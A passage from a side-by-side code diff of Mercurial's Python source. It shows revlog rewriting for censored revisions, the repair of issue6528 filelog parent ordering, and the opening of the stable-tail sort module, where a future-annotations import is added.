324 | 326 | docket.sidedata_end = sidedata_cutoff |
|
325 | 327 | |
|
326 | 328 | # reload the revlog internal information |
|
327 | 329 | revlog.clearcaches() |
|
328 | 330 | revlog._loadindex(docket=docket) |
|
329 | 331 | |
|
330 | 332 | @contextlib.contextmanager |
|
331 | 333 | def all_files_opener(): |
|
332 | 334 | # hide opening in an helper function to please check-code, black |
|
333 | 335 | # and various python version at the same time |
|
334 | 336 | with open(old_data_filepath, 'rb') as old_data_file: |
|
335 | 337 | with open(old_sidedata_filepath, 'rb') as old_sidedata_file: |
|
336 | 338 | with open(new_index_filepath, 'r+b') as new_index_file: |
|
337 | 339 | with open(new_data_filepath, 'r+b') as new_data_file: |
|
338 | 340 | with open( |
|
339 | 341 | new_sidedata_filepath, 'r+b' |
|
340 | 342 | ) as new_sidedata_file: |
|
341 | 343 | new_index_file.seek(0, os.SEEK_END) |
|
342 | 344 | assert new_index_file.tell() == index_cutoff |
|
343 | 345 | new_data_file.seek(0, os.SEEK_END) |
|
344 | 346 | assert new_data_file.tell() == data_cutoff |
|
345 | 347 | new_sidedata_file.seek(0, os.SEEK_END) |
|
346 | 348 | assert new_sidedata_file.tell() == sidedata_cutoff |
|
347 | 349 | yield ( |
|
348 | 350 | old_data_file, |
|
349 | 351 | old_sidedata_file, |
|
350 | 352 | new_index_file, |
|
351 | 353 | new_data_file, |
|
352 | 354 | new_sidedata_file, |
|
353 | 355 | ) |
|
354 | 356 | |
|
355 | 357 | return all_files_opener |
|
356 | 358 | |
|
357 | 359 | |
|
358 | 360 | def _rewrite_simple( |
|
359 | 361 | revlog, |
|
360 | 362 | old_index, |
|
361 | 363 | all_files, |
|
362 | 364 | rev, |
|
363 | 365 | rewritten_entries, |
|
364 | 366 | tmp_storage, |
|
365 | 367 | ): |
|
366 | 368 | """append a normal revision to the index after the rewritten one(s)""" |
|
367 | 369 | ( |
|
368 | 370 | old_data_file, |
|
369 | 371 | old_sidedata_file, |
|
370 | 372 | new_index_file, |
|
371 | 373 | new_data_file, |
|
372 | 374 | new_sidedata_file, |
|
373 | 375 | ) = all_files |
|
374 | 376 | entry = old_index[rev] |
|
375 | 377 | flags = entry[ENTRY_DATA_OFFSET] & 0xFFFF |
|
376 | 378 | old_data_offset = entry[ENTRY_DATA_OFFSET] >> 16 |
|
377 | 379 | |
|
378 | 380 | if rev not in rewritten_entries: |
|
379 | 381 | old_data_file.seek(old_data_offset) |
|
380 | 382 | new_data_size = entry[ENTRY_DATA_COMPRESSED_LENGTH] |
|
381 | 383 | new_data = old_data_file.read(new_data_size) |
|
382 | 384 | data_delta_base = entry[ENTRY_DELTA_BASE] |
|
383 | 385 | d_comp_mode = entry[ENTRY_DATA_COMPRESSION_MODE] |
|
384 | 386 | else: |
|
385 | 387 | ( |
|
386 | 388 | data_delta_base, |
|
387 | 389 | start, |
|
388 | 390 | end, |
|
389 | 391 | d_comp_mode, |
|
390 | 392 | ) = rewritten_entries[rev] |
|
391 | 393 | new_data_size = end - start |
|
392 | 394 | tmp_storage.seek(start) |
|
393 | 395 | new_data = tmp_storage.read(new_data_size) |
|
394 | 396 | |
|
395 | 397 | # It might be faster to group continuous read/write operation, |
|
396 | 398 | # however, this is censor, an operation that is not focussed |
|
397 | 399 | # around stellar performance. So I have not written this |
|
398 | 400 | # optimisation yet. |
|
399 | 401 | new_data_offset = new_data_file.tell() |
|
400 | 402 | new_data_file.write(new_data) |
|
401 | 403 | |
|
402 | 404 | sidedata_size = entry[ENTRY_SIDEDATA_COMPRESSED_LENGTH] |
|
403 | 405 | new_sidedata_offset = new_sidedata_file.tell() |
|
404 | 406 | if 0 < sidedata_size: |
|
405 | 407 | old_sidedata_offset = entry[ENTRY_SIDEDATA_OFFSET] |
|
406 | 408 | old_sidedata_file.seek(old_sidedata_offset) |
|
407 | 409 | new_sidedata = old_sidedata_file.read(sidedata_size) |
|
408 | 410 | new_sidedata_file.write(new_sidedata) |
|
409 | 411 | |
|
410 | 412 | data_uncompressed_length = entry[ENTRY_DATA_UNCOMPRESSED_LENGTH] |
|
411 | 413 | sd_com_mode = entry[ENTRY_SIDEDATA_COMPRESSION_MODE] |
|
412 | 414 | assert data_delta_base <= rev, (data_delta_base, rev) |
|
413 | 415 | |
|
414 | 416 | new_entry = revlogutils.entry( |
|
415 | 417 | flags=flags, |
|
416 | 418 | data_offset=new_data_offset, |
|
417 | 419 | data_compressed_length=new_data_size, |
|
418 | 420 | data_uncompressed_length=data_uncompressed_length, |
|
419 | 421 | data_delta_base=data_delta_base, |
|
420 | 422 | link_rev=entry[ENTRY_LINK_REV], |
|
421 | 423 | parent_rev_1=entry[ENTRY_PARENT_1], |
|
422 | 424 | parent_rev_2=entry[ENTRY_PARENT_2], |
|
423 | 425 | node_id=entry[ENTRY_NODE_ID], |
|
424 | 426 | sidedata_offset=new_sidedata_offset, |
|
425 | 427 | sidedata_compressed_length=sidedata_size, |
|
426 | 428 | data_compression_mode=d_comp_mode, |
|
427 | 429 | sidedata_compression_mode=sd_com_mode, |
|
428 | 430 | ) |
|
429 | 431 | revlog.index.append(new_entry) |
|
430 | 432 | entry_bin = revlog.index.entry_binary(rev) |
|
431 | 433 | new_index_file.write(entry_bin) |
|
432 | 434 | |
|
433 | 435 | revlog._docket.index_end = new_index_file.tell() |
|
434 | 436 | revlog._docket.data_end = new_data_file.tell() |
|
435 | 437 | revlog._docket.sidedata_end = new_sidedata_file.tell() |
|
436 | 438 | |
|
437 | 439 | |
|
438 | 440 | def _rewrite_censor( |
|
439 | 441 | revlog, |
|
440 | 442 | old_index, |
|
441 | 443 | all_files, |
|
442 | 444 | rev, |
|
443 | 445 | tombstone, |
|
444 | 446 | ): |
|
445 | 447 | """rewrite and append a censored revision""" |
|
446 | 448 | ( |
|
447 | 449 | old_data_file, |
|
448 | 450 | old_sidedata_file, |
|
449 | 451 | new_index_file, |
|
450 | 452 | new_data_file, |
|
451 | 453 | new_sidedata_file, |
|
452 | 454 | ) = all_files |
|
453 | 455 | entry = old_index[rev] |
|
454 | 456 | |
|
455 | 457 | # XXX consider trying the default compression too |
|
456 | 458 | new_data_size = len(tombstone) |
|
457 | 459 | new_data_offset = new_data_file.tell() |
|
458 | 460 | new_data_file.write(tombstone) |
|
459 | 461 | |
|
460 | 462 | # we are not adding any sidedata as they might leak info about the censored version |
|
461 | 463 | |
|
462 | 464 | link_rev = entry[ENTRY_LINK_REV] |
|
463 | 465 | |
|
464 | 466 | p1 = entry[ENTRY_PARENT_1] |
|
465 | 467 | p2 = entry[ENTRY_PARENT_2] |
|
466 | 468 | |
|
467 | 469 | new_entry = revlogutils.entry( |
|
468 | 470 | flags=constants.REVIDX_ISCENSORED, |
|
469 | 471 | data_offset=new_data_offset, |
|
470 | 472 | data_compressed_length=new_data_size, |
|
471 | 473 | data_uncompressed_length=new_data_size, |
|
472 | 474 | data_delta_base=rev, |
|
473 | 475 | link_rev=link_rev, |
|
474 | 476 | parent_rev_1=p1, |
|
475 | 477 | parent_rev_2=p2, |
|
476 | 478 | node_id=entry[ENTRY_NODE_ID], |
|
477 | 479 | sidedata_offset=0, |
|
478 | 480 | sidedata_compressed_length=0, |
|
479 | 481 | data_compression_mode=COMP_MODE_PLAIN, |
|
480 | 482 | sidedata_compression_mode=COMP_MODE_PLAIN, |
|
481 | 483 | ) |
|
482 | 484 | revlog.index.append(new_entry) |
|
483 | 485 | entry_bin = revlog.index.entry_binary(rev) |
|
484 | 486 | new_index_file.write(entry_bin) |
|
485 | 487 | revlog._docket.index_end = new_index_file.tell() |
|
486 | 488 | revlog._docket.data_end = new_data_file.tell() |
|
487 | 489 | |
|
488 | 490 | |
|
489 | 491 | def _get_filename_from_filelog_index(path): |
|
490 | 492 | # Drop the extension and the `data/` prefix |
|
491 | 493 | path_part = path.rsplit(b'.', 1)[0].split(b'/', 1) |
|
492 | 494 | if len(path_part) < 2: |
|
493 | 495 | msg = _(b"cannot recognize filelog from filename: '%s'") |
|
494 | 496 | msg %= path |
|
495 | 497 | raise error.Abort(msg) |
|
496 | 498 | |
|
497 | 499 | return path_part[1] |
|
498 | 500 | |
|
499 | 501 | |
|
500 | 502 | def _filelog_from_filename(repo, path): |
|
501 | 503 | """Returns the filelog for the given `path`. Stolen from `engine.py`""" |
|
502 | 504 | |
|
503 | 505 | from .. import filelog # avoid cycle |
|
504 | 506 | |
|
505 | 507 | fl = filelog.filelog(repo.svfs, path) |
|
506 | 508 | return fl |
|
507 | 509 | |
|
508 | 510 | |
|
509 | 511 | def _write_swapped_parents(repo, rl, rev, offset, fp): |
|
510 | 512 | """Swaps p1 and p2 and overwrites the revlog entry for `rev` in `fp`""" |
|
511 | 513 | from ..pure import parsers # avoid cycle |
|
512 | 514 | |
|
513 | 515 | if repo._currentlock(repo._lockref) is None: |
|
514 | 516 | # Let's be paranoid about it |
|
515 | 517 | msg = "repo needs to be locked to rewrite parents" |
|
516 | 518 | raise error.ProgrammingError(msg) |
|
517 | 519 | |
|
518 | 520 | index_format = parsers.IndexObject.index_format |
|
519 | 521 | entry = rl.index[rev] |
|
520 | 522 | new_entry = list(entry) |
|
521 | 523 | new_entry[5], new_entry[6] = entry[6], entry[5] |
|
522 | 524 | packed = index_format.pack(*new_entry[:8]) |
|
523 | 525 | fp.seek(offset) |
|
524 | 526 | fp.write(packed) |
|
525 | 527 | |
|
526 | 528 | |
|
527 | 529 | def _reorder_filelog_parents(repo, fl, to_fix): |
|
528 | 530 | """ |
|
529 | 531 | Swaps p1 and p2 for all `to_fix` revisions of filelog `fl` and writes the |
|
530 | 532 | new version to disk, overwriting the old one with a rename. |
|
531 | 533 | """ |
|
532 | 534 | from ..pure import parsers # avoid cycle |
|
533 | 535 | |
|
534 | 536 | ui = repo.ui |
|
535 | 537 | assert len(to_fix) > 0 |
|
536 | 538 | rl = fl._revlog |
|
537 | 539 | if rl._format_version != constants.REVLOGV1: |
|
538 | 540 | msg = "expected version 1 revlog, got version '%d'" % rl._format_version |
|
539 | 541 | raise error.ProgrammingError(msg) |
|
540 | 542 | |
|
541 | 543 | index_file = rl._indexfile |
|
542 | 544 | new_file_path = index_file + b'.tmp-parents-fix' |
|
543 | 545 | repaired_msg = _(b"repaired revision %d of 'filelog %s'\n") |
|
544 | 546 | |
|
545 | 547 | with ui.uninterruptible(): |
|
546 | 548 | try: |
|
547 | 549 | util.copyfile( |
|
548 | 550 | rl.opener.join(index_file), |
|
549 | 551 | rl.opener.join(new_file_path), |
|
550 | 552 | checkambig=rl.data_config.check_ambig, |
|
551 | 553 | ) |
|
552 | 554 | |
|
553 | 555 | with rl.opener(new_file_path, mode=b"r+") as fp: |
|
554 | 556 | if rl._inline: |
|
555 | 557 | index = parsers.InlinedIndexObject(fp.read()) |
|
556 | 558 | for rev in fl.revs(): |
|
557 | 559 | if rev in to_fix: |
|
558 | 560 | offset = index._calculate_index(rev) |
|
559 | 561 | _write_swapped_parents(repo, rl, rev, offset, fp) |
|
560 | 562 | ui.write(repaired_msg % (rev, index_file)) |
|
561 | 563 | else: |
|
562 | 564 | index_format = parsers.IndexObject.index_format |
|
563 | 565 | for rev in to_fix: |
|
564 | 566 | offset = rev * index_format.size |
|
565 | 567 | _write_swapped_parents(repo, rl, rev, offset, fp) |
|
566 | 568 | ui.write(repaired_msg % (rev, index_file)) |
|
567 | 569 | |
|
568 | 570 | rl.opener.rename(new_file_path, index_file) |
|
569 | 571 | rl.clearcaches() |
|
570 | 572 | rl._loadindex() |
|
571 | 573 | finally: |
|
572 | 574 | util.tryunlink(new_file_path) |
|
573 | 575 | |
|
574 | 576 | |
|
575 | 577 | def _is_revision_affected(fl, filerev, metadata_cache=None): |
|
576 | 578 | full_text = lambda: fl._revlog.rawdata(filerev) |
|
577 | 579 | parent_revs = lambda: fl._revlog.parentrevs(filerev) |
|
578 | 580 | return _is_revision_affected_inner( |
|
579 | 581 | full_text, parent_revs, filerev, metadata_cache |
|
580 | 582 | ) |
|
581 | 583 | |
|
582 | 584 | |
|
583 | 585 | def _is_revision_affected_inner( |
|
584 | 586 | full_text, |
|
585 | 587 | parents_revs, |
|
586 | 588 | filerev, |
|
587 | 589 | metadata_cache=None, |
|
588 | 590 | ): |
|
589 | 591 | """Mercurial currently (5.9rc0) uses `p1 == nullrev and p2 != nullrev` as a |
|
590 | 592 | special meaning compared to the reverse in the context of filelog-based |
|
591 | 593 | copytracing. issue6528 exists because new code assumed that parent ordering |
|
592 | 594 | didn't matter, so this detects if the revision contains metadata (since |
|
593 | 595 | it's only used for filelog-based copytracing) and its parents are in the |
|
594 | 596 | "wrong" order.""" |
|
595 | 597 | try: |
|
596 | 598 | raw_text = full_text() |
|
597 | 599 | except error.CensoredNodeError: |
|
598 | 600 | # We don't care about censored nodes as they never carry metadata |
|
599 | 601 | return False |
|
600 | 602 | |
|
601 | 603 | # raw text can be a `memoryview`, which doesn't implement `startswith` |
|
602 | 604 | has_meta = bytes(raw_text[:2]) == b'\x01\n' |
|
603 | 605 | if metadata_cache is not None: |
|
604 | 606 | metadata_cache[filerev] = has_meta |
|
605 | 607 | if has_meta: |
|
606 | 608 | (p1, p2) = parents_revs() |
|
607 | 609 | if p1 != nullrev and p2 == nullrev: |
|
608 | 610 | return True |
|
609 | 611 | return False |
|
610 | 612 | |
|
611 | 613 | |
|
612 | 614 | def _is_revision_affected_fast(repo, fl, filerev, metadata_cache): |
|
613 | 615 | rl = fl._revlog |
|
614 | 616 | is_censored = lambda: rl.iscensored(filerev) |
|
615 | 617 | delta_base = lambda: rl.deltaparent(filerev) |
|
616 | 618 | delta = lambda: rl._chunk(filerev) |
|
617 | 619 | full_text = lambda: rl.rawdata(filerev) |
|
618 | 620 | parent_revs = lambda: rl.parentrevs(filerev) |
|
619 | 621 | return _is_revision_affected_fast_inner( |
|
620 | 622 | is_censored, |
|
621 | 623 | delta_base, |
|
622 | 624 | delta, |
|
623 | 625 | full_text, |
|
624 | 626 | parent_revs, |
|
625 | 627 | filerev, |
|
626 | 628 | metadata_cache, |
|
627 | 629 | ) |
|
628 | 630 | |
|
629 | 631 | |
|
630 | 632 | def _is_revision_affected_fast_inner( |
|
631 | 633 | is_censored, |
|
632 | 634 | delta_base, |
|
633 | 635 | delta, |
|
634 | 636 | full_text, |
|
635 | 637 | parent_revs, |
|
636 | 638 | filerev, |
|
637 | 639 | metadata_cache, |
|
638 | 640 | ): |
|
639 | 641 | """Optimization fast-path for `_is_revision_affected`. |
|
640 | 642 | |
|
641 | 643 | `metadata_cache` is a dict of `{rev: has_metadata}` which allows any |
|
642 | 644 | revision to check if its base has metadata, saving computation of the full |
|
643 | 645 | text, instead looking at the current delta. |
|
644 | 646 | |
|
645 | 647 | This optimization only works if the revisions are looked at in order.""" |
|
646 | 648 | |
|
647 | 649 | if is_censored(): |
|
648 | 650 | # Censored revisions don't contain metadata, so they cannot be affected |
|
649 | 651 | metadata_cache[filerev] = False |
|
650 | 652 | return False |
|
651 | 653 | |
|
652 | 654 | p1, p2 = parent_revs() |
|
653 | 655 | if p1 == nullrev or p2 != nullrev: |
|
654 | 656 | return False |
|
655 | 657 | |
|
656 | 658 | delta_parent = delta_base() |
|
657 | 659 | parent_has_metadata = metadata_cache.get(delta_parent) |
|
658 | 660 | if parent_has_metadata is None: |
|
659 | 661 | return _is_revision_affected_inner( |
|
660 | 662 | full_text, |
|
661 | 663 | parent_revs, |
|
662 | 664 | filerev, |
|
663 | 665 | metadata_cache, |
|
664 | 666 | ) |
|
665 | 667 | |
|
666 | 668 | chunk = delta() |
|
667 | 669 | if not len(chunk): |
|
668 | 670 | # No diff for this revision |
|
669 | 671 | return parent_has_metadata |
|
670 | 672 | |
|
671 | 673 | header_length = 12 |
|
672 | 674 | if len(chunk) < header_length: |
|
673 | 675 | raise error.Abort(_(b"patch cannot be decoded")) |
|
674 | 676 | |
|
675 | 677 | start, _end, _length = struct.unpack(b">lll", chunk[:header_length]) |
|
676 | 678 | |
|
677 | 679 | if start < 2: # len(b'\x01\n') == 2 |
|
678 | 680 | # This delta does *something* to the metadata marker (if any). |
|
679 | 681 | # Check it the slow way |
|
680 | 682 | is_affected = _is_revision_affected_inner( |
|
681 | 683 | full_text, |
|
682 | 684 | parent_revs, |
|
683 | 685 | filerev, |
|
684 | 686 | metadata_cache, |
|
685 | 687 | ) |
|
686 | 688 | return is_affected |
|
687 | 689 | |
|
688 | 690 | # The diff did not remove or add the metadata header, it's then in the same |
|
689 | 691 | # situation as its parent |
|
690 | 692 | metadata_cache[filerev] = parent_has_metadata |
|
691 | 693 | return parent_has_metadata |
|
692 | 694 | |
|
693 | 695 | |
|
694 | 696 | def _from_report(ui, repo, context, from_report, dry_run): |
|
695 | 697 | """ |
|
696 | 698 | Fix the revisions given in the `from_report` file, but still checks if the |
|
697 | 699 | revisions are indeed affected to prevent an unfortunate cyclic situation |
|
698 | 700 | where we'd swap well-ordered parents again. |
|
699 | 701 | |
|
700 | 702 | See the doc for `debug_fix_issue6528` for the format documentation. |
|
701 | 703 | """ |
|
702 | 704 | ui.write(_(b"loading report file '%s'\n") % from_report) |
|
703 | 705 | |
|
704 | 706 | with context(), open(from_report, mode='rb') as f: |
|
705 | 707 | for line in f.read().split(b'\n'): |
|
706 | 708 | if not line: |
|
707 | 709 | continue |
|
708 | 710 | filenodes, filename = line.split(b' ', 1) |
|
709 | 711 | fl = _filelog_from_filename(repo, filename) |
|
710 | 712 | to_fix = set( |
|
711 | 713 | fl.rev(binascii.unhexlify(n)) for n in filenodes.split(b',') |
|
712 | 714 | ) |
|
713 | 715 | excluded = set() |
|
714 | 716 | |
|
715 | 717 | for filerev in to_fix: |
|
716 | 718 | if _is_revision_affected(fl, filerev): |
|
717 | 719 | msg = b"found affected revision %d for filelog '%s'\n" |
|
718 | 720 | ui.warn(msg % (filerev, filename)) |
|
719 | 721 | else: |
|
720 | 722 | msg = _(b"revision %s of file '%s' is not affected\n") |
|
721 | 723 | msg %= (binascii.hexlify(fl.node(filerev)), filename) |
|
722 | 724 | ui.warn(msg) |
|
723 | 725 | excluded.add(filerev) |
|
724 | 726 | |
|
725 | 727 | to_fix = to_fix - excluded |
|
726 | 728 | if not to_fix: |
|
727 | 729 | msg = _(b"no affected revisions were found for '%s'\n") |
|
728 | 730 | ui.write(msg % filename) |
|
729 | 731 | continue |
|
730 | 732 | if not dry_run: |
|
731 | 733 | _reorder_filelog_parents(repo, fl, sorted(to_fix)) |
|
732 | 734 | |
|
733 | 735 | |
|
734 | 736 | def filter_delta_issue6528(revlog, deltas_iter): |
|
735 | 737 | """filter incomind deltas to repaire issue 6528 on the fly""" |
|
736 | 738 | metadata_cache = {} |
|
737 | 739 | |
|
738 | 740 | deltacomputer = deltas.deltacomputer(revlog) |
|
739 | 741 | |
|
740 | 742 | for rev, d in enumerate(deltas_iter, len(revlog)): |
|
741 | 743 | ( |
|
742 | 744 | node, |
|
743 | 745 | p1_node, |
|
744 | 746 | p2_node, |
|
745 | 747 | linknode, |
|
746 | 748 | deltabase, |
|
747 | 749 | delta, |
|
748 | 750 | flags, |
|
749 | 751 | sidedata, |
|
750 | 752 | ) = d |
|
751 | 753 | |
|
752 | 754 | if not revlog.index.has_node(deltabase): |
|
753 | 755 | raise error.LookupError( |
|
754 | 756 | deltabase, revlog.radix, _(b'unknown parent') |
|
755 | 757 | ) |
|
756 | 758 | base_rev = revlog.rev(deltabase) |
|
757 | 759 | if not revlog.index.has_node(p1_node): |
|
758 | 760 | raise error.LookupError(p1_node, revlog.radix, _(b'unknown parent')) |
|
759 | 761 | p1_rev = revlog.rev(p1_node) |
|
760 | 762 | if not revlog.index.has_node(p2_node): |
|
761 | 763 | raise error.LookupError(p2_node, revlog.radix, _(b'unknown parent')) |
|
762 | 764 | p2_rev = revlog.rev(p2_node) |
|
763 | 765 | |
|
764 | 766 | is_censored = lambda: bool(flags & REVIDX_ISCENSORED) |
|
765 | 767 | delta_base = lambda: revlog.rev(delta_base) |
|
766 | 768 | delta_base = lambda: base_rev |
|
767 | 769 | parent_revs = lambda: (p1_rev, p2_rev) |
|
768 | 770 | |
|
769 | 771 | def full_text(): |
|
770 | 772 | # note: being able to reuse the full text computation in the |
|
771 | 773 | # underlying addrevision would be useful however this is a bit too |
|
772 | 774 | # intrusive the for the "quick" issue6528 we are writing before the |
|
773 | 775 | # 5.8 release |
|
774 | 776 | textlen = mdiff.patchedsize(revlog.size(base_rev), delta) |
|
775 | 777 | |
|
776 | 778 | revinfo = revlogutils.revisioninfo( |
|
777 | 779 | node, |
|
778 | 780 | p1_node, |
|
779 | 781 | p2_node, |
|
780 | 782 | [None], |
|
781 | 783 | textlen, |
|
782 | 784 | (base_rev, delta), |
|
783 | 785 | flags, |
|
784 | 786 | ) |
|
785 | 787 | return deltacomputer.buildtext(revinfo) |
|
786 | 788 | |
|
787 | 789 | is_affected = _is_revision_affected_fast_inner( |
|
788 | 790 | is_censored, |
|
789 | 791 | delta_base, |
|
790 | 792 | lambda: delta, |
|
791 | 793 | full_text, |
|
792 | 794 | parent_revs, |
|
793 | 795 | rev, |
|
794 | 796 | metadata_cache, |
|
795 | 797 | ) |
|
796 | 798 | if is_affected: |
|
797 | 799 | d = ( |
|
798 | 800 | node, |
|
799 | 801 | p2_node, |
|
800 | 802 | p1_node, |
|
801 | 803 | linknode, |
|
802 | 804 | deltabase, |
|
803 | 805 | delta, |
|
804 | 806 | flags, |
|
805 | 807 | sidedata, |
|
806 | 808 | ) |
|
807 | 809 | yield d |
|
808 | 810 | |
|
809 | 811 | |
|
810 | 812 | def repair_issue6528( |
|
811 | 813 | ui, repo, dry_run=False, to_report=None, from_report=None, paranoid=False |
|
812 | 814 | ): |
|
813 | 815 | @contextlib.contextmanager |
|
814 | 816 | def context(): |
|
815 | 817 | if dry_run or to_report: # No need for locking |
|
816 | 818 | yield |
|
817 | 819 | else: |
|
818 | 820 | with repo.wlock(), repo.lock(): |
|
819 | 821 | yield |
|
820 | 822 | |
|
821 | 823 | if from_report: |
|
822 | 824 | return _from_report(ui, repo, context, from_report, dry_run) |
|
823 | 825 | |
|
824 | 826 | report_entries = [] |
|
825 | 827 | |
|
826 | 828 | with context(): |
|
827 | 829 | files = list( |
|
828 | 830 | entry |
|
829 | 831 | for entry in repo.store.data_entries() |
|
830 | 832 | if entry.is_revlog and entry.is_filelog |
|
831 | 833 | ) |
|
832 | 834 | |
|
833 | 835 | progress = ui.makeprogress( |
|
834 | 836 | _(b"looking for affected revisions"), |
|
835 | 837 | unit=_(b"filelogs"), |
|
836 | 838 | total=len(files), |
|
837 | 839 | ) |
|
838 | 840 | found_nothing = True |
|
839 | 841 | |
|
840 | 842 | for entry in files: |
|
841 | 843 | progress.increment() |
|
842 | 844 | filename = entry.target_id |
|
843 | 845 | fl = _filelog_from_filename(repo, entry.target_id) |
|
844 | 846 | |
|
845 | 847 | # Set of filerevs (or hex filenodes if `to_report`) that need fixing |
|
846 | 848 | to_fix = set() |
|
847 | 849 | metadata_cache = {} |
|
848 | 850 | for filerev in fl.revs(): |
|
849 | 851 | affected = _is_revision_affected_fast( |
|
850 | 852 | repo, fl, filerev, metadata_cache |
|
851 | 853 | ) |
|
852 | 854 | if paranoid: |
|
853 | 855 | slow = _is_revision_affected(fl, filerev) |
|
854 | 856 | if slow != affected: |
|
855 | 857 | msg = _(b"paranoid check failed for '%s' at node %s") |
|
856 | 858 | node = binascii.hexlify(fl.node(filerev)) |
|
857 | 859 | raise error.Abort(msg % (filename, node)) |
|
858 | 860 | if affected: |
|
859 | 861 | msg = b"found affected revision %d for file '%s'\n" |
|
860 | 862 | ui.warn(msg % (filerev, filename)) |
|
861 | 863 | found_nothing = False |
|
862 | 864 | if not dry_run: |
|
863 | 865 | if to_report: |
|
864 | 866 | to_fix.add(binascii.hexlify(fl.node(filerev))) |
|
865 | 867 | else: |
|
866 | 868 | to_fix.add(filerev) |
|
867 | 869 | |
|
868 | 870 | if to_fix: |
|
869 | 871 | to_fix = sorted(to_fix) |
|
870 | 872 | if to_report: |
|
871 | 873 | report_entries.append((filename, to_fix)) |
|
872 | 874 | else: |
|
873 | 875 | _reorder_filelog_parents(repo, fl, to_fix) |
|
874 | 876 | |
|
875 | 877 | if found_nothing: |
|
876 | 878 | ui.write(_(b"no affected revisions were found\n")) |
|
877 | 879 | |
|
878 | 880 | if to_report and report_entries: |
|
879 | 881 | with open(to_report, mode="wb") as f: |
|
880 | 882 | for path, to_fix in report_entries: |
|
881 | 883 | f.write(b"%s %s\n" % (b",".join(to_fix), path)) |
|
882 | 884 | |
|
883 | 885 | progress.complete() |
@@ -1,172 +1,174 | |||
|
1 | 1 | # stabletailsort.py - stable ordering of revisions |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2021-2023 Pacien TRAN-GIRARD <pacien.trangirard@pacien.net> |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | |
|
8 | 8 | """ |
|
9 | 9 | Stable-tail sort computation. |
|
10 | 10 | |
|
11 | 11 | The "stable-tail sort", or STS, is a reverse topological ordering of the |
|
12 | 12 | ancestors of a node, which tends to share large suffixes with the stable-tail |
|
13 | 13 | sort of ancestors and other nodes, giving it its name. |
|
14 | 14 | |
|
15 | 15 | Its properties should make it suitable for making chunks of ancestors with high |
|
16 | 16 | reuse and incrementality for example. |
|
17 | 17 | |
|
18 | 18 | This module and implementation are experimental. Most functions are not yet |
|
19 | 19 | optimised to operate on large production graphs. |
|
20 | 20 | """ |
|
21 | 21 | |
|
22 | from __future__ import annotations | |
|
23 | ||
|
22 | 24 | import itertools |
|
23 | 25 | from ..node import nullrev |
|
24 | 26 | from .. import ancestor |
|
25 | 27 | |
|
26 | 28 | |
|
27 | 29 | def _sorted_parents(cl, p1, p2): |
|
28 | 30 | """ |
|
29 | 31 | Chooses and returns the pair (px, pt) from (p1, p2). |
|
30 | 32 | |
|
31 | 33 | Where |
|
32 | 34 | "px" denotes the parent starting the "exclusive" part, and |
|
33 | 35 | "pt" denotes the parent starting the "Tail" part. |
|
34 | 36 | |
|
35 | 37 | "px" is chosen as the parent with the lowest rank with the goal of |
|
36 | 38 | minimising the size of the exclusive part and maximise the size of the |
|
37 | 39 | tail part, hopefully reducing the overall complexity of the stable-tail |
|
38 | 40 | sort. |
|
39 | 41 | |
|
40 | 42 | In case of equal ranks, the stable node ID is used as a tie-breaker. |
|
41 | 43 | """ |
|
42 | 44 | r1, r2 = cl.fast_rank(p1), cl.fast_rank(p2) |
|
43 | 45 | if r1 < r2: |
|
44 | 46 | return (p1, p2) |
|
45 | 47 | elif r1 > r2: |
|
46 | 48 | return (p2, p1) |
|
47 | 49 | elif cl.node(p1) < cl.node(p2): |
|
48 | 50 | return (p1, p2) |
|
49 | 51 | else: |
|
50 | 52 | return (p2, p1) |
|
51 | 53 | |
|
52 | 54 | |
|
53 | 55 | def _nonoedipal_parent_revs(cl, rev): |
|
54 | 56 | """ |
|
55 | 57 | Returns the non-Εdipal parent pair of the given revision. |
|
56 | 58 | |
|
57 | 59 | An Εdipal merge is a merge with parents p1, p2 with either |
|
58 | 60 | p1 in ancestors(p2) or p2 in ancestors(p1). |
|
59 | 61 | In the first case, p1 is the Εdipal parent. |
|
60 | 62 | In the second case, p2 is the Εdipal parent. |
|
61 | 63 | |
|
62 | 64 | Εdipal edges start empty exclusive parts. They do not bring new ancestors. |
|
63 | 65 | As such, they can be skipped when computing any topological sort or any |
|
64 | 66 | iteration over the ancestors of a node. |
|
65 | 67 | |
|
66 | 68 | The Εdipal edges are eliminated here using the rank information. |
|
67 | 69 | """ |
|
68 | 70 | p1, p2 = cl.parentrevs(rev) |
|
69 | 71 | if p1 == nullrev or cl.fast_rank(p2) == cl.fast_rank(rev) - 1: |
|
70 | 72 | return p2, nullrev |
|
71 | 73 | elif p2 == nullrev or cl.fast_rank(p1) == cl.fast_rank(rev) - 1: |
|
72 | 74 | return p1, nullrev |
|
73 | 75 | else: |
|
74 | 76 | return p1, p2 |
|
75 | 77 | |
|
76 | 78 | |
|
77 | 79 | def _parents(cl, rev): |
|
78 | 80 | p1, p2 = _nonoedipal_parent_revs(cl, rev) |
|
79 | 81 | if p2 == nullrev: |
|
80 | 82 | return p1, p2 |
|
81 | 83 | |
|
82 | 84 | return _sorted_parents(cl, p1, p2) |
|
83 | 85 | |
|
84 | 86 | |
|
85 | 87 | def _stable_tail_sort_naive(cl, head_rev): |
|
86 | 88 | """ |
|
87 | 89 | Naive topological iterator of the ancestors given by the stable-tail sort. |
|
88 | 90 | |
|
89 | 91 | The stable-tail sort of a node "h" is defined as the sequence: |
|
90 | 92 | sts(h) := [h] + excl(h) + sts(pt(h)) |
|
91 | 93 | where excl(h) := u for u in sts(px(h)) if u not in ancestors(pt(h)) |
|
92 | 94 | |
|
93 | 95 | This implementation uses a call-stack whose size is |
|
94 | 96 | O(number of open merges). |
|
95 | 97 | |
|
96 | 98 | As such, this implementation exists mainly as a defining reference. |
|
97 | 99 | """ |
|
98 | 100 | cursor_rev = head_rev |
|
99 | 101 | while cursor_rev != nullrev: |
|
100 | 102 | yield cursor_rev |
|
101 | 103 | |
|
102 | 104 | px, pt = _parents(cl, cursor_rev) |
|
103 | 105 | if pt == nullrev: |
|
104 | 106 | cursor_rev = px |
|
105 | 107 | else: |
|
106 | 108 | tail_ancestors = ancestor.lazyancestors( |
|
107 | 109 | cl.parentrevs, (pt,), inclusive=True |
|
108 | 110 | ) |
|
109 | 111 | exclusive_ancestors = ( |
|
110 | 112 | a |
|
111 | 113 | for a in _stable_tail_sort_naive(cl, px) |
|
112 | 114 | if a not in tail_ancestors |
|
113 | 115 | ) |
|
114 | 116 | |
|
